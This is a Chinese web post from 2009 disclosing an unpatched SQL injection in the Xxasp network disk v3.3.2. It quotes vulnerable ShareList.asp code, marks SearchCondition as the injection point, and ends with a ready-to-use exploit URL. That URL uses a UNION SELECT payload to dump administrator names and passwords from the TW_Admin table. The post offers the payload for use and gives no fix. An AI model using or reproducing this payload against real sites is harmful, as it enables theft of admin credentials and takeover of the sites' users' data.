Xxasp网络硬盘v3.3.2 Sql injection 0day

2009/12/7 来源:www.arpun.com 作者:小白

至于这套系统我就不多介绍了,漏洞涉及文件为MyFiles.asp ShareList.asp,

我以ShareList.asp为例简单分析下,代码如下:

Dim MyOrderBy,MyCondition,MyTopField,SearchType,SearchCondition

SearchType=Trim(Request("SearchType"))

SearchCondition=Trim(Request("SearchCondition"))     //注入点

If SearchType="" Then SearchType="BaseSearch"

If SearchCondition="" Then SearchCondition="1"

MyTopField=""

Select Case SearchType

Case "BaseSearch"

Select Case SearchCondition

Case "2"

MyOrderBy="A.F_AddTime Desc":MyCondition="Datediff('h',A.F_AddTime,"&SqlNowString&")<25"

Case "3"

MyOrderBy="A.F_AddTime Desc":MyCondition="Datediff('d',F_AddTime,"&SqlNowString&")<3"

Case "4"

MyOrderBy="A.F_AddTime Desc":MyCondition="Datediff('d',A.F_AddTime,"&SqlNowString&")<7"

Case "5"

MyOrderBy="A.F_AddTime Desc":MyCondition="Datediff('d',A.F_AddTime,"&SqlNowString&")<21"

Case "6"

MyOrderBy="A.F_AddTime Desc":MyCondition="Datediff('m',A.F_AddTime,"&SqlNowString&")<1"

Case "7"

MyOrderBy="A.F_AddTime Desc":MyCondition="Datediff('m',A.F_AddTime,"&SqlNowString&")<3"

Case "8"

MyTopField="Top 100 ":MyOrderBy="A.F_DownloadTimes Desc":MyCondition=""

Case "9"

If ClsPub.TW_Config(42)<=1 Then

MyOrderBy="A.F_AddTime Desc":MyCondition="Datediff('h',A.F_AddTime,"&SqlNowString&")<25"

Else

MyOrderBy="A.F_AddTime Desc":MyCondition="Datediff('d',A.F_AddTime,"&SqlNowString&")<"&ClsPub.TW_Config(42)

End If

Case "10"

If ClsPub.TW_Config(42)<=1 Then

MyOrderBy="A.F_AddTime Desc":MyCondition="Datediff('h',A.F_AddTime,"&SqlNowString&")>25"

Else

MyOrderBy="A.F_AddTime Desc":MyCondition="Datediff('d',A.F_AddTime,"&SqlNowString&")>"&ClsPub.TW_Config(42)

End If

Case Else

MyOrderBy="A.F_AddTime Desc":MyCondition=""

End Select

Case "SearchFileType"

If SearchCondition<>"1" Then

MyOrderBy="A.F_AddTime Desc":MyCondition="A.F_Ext='"&Lcase(SearchCondition)&"'" //如果SearchCondition不为1,带入sql查询

Else

MyOrderBy="A.F_AddTime Desc":MyCondition=""

End If

exp:注册登陆后,http://www.xxx.com/disk/ShareList.asp?Action=Main&SearchType=SearchFileType&SearchCondition=rar' and 1=2 union select

1,2,3,4,5,6,7,8,9,10,11,AdminName,AdminPwd,14,15,16,17 from TW_Admin where '1'='1

 

网友评论
评论(...
全部评论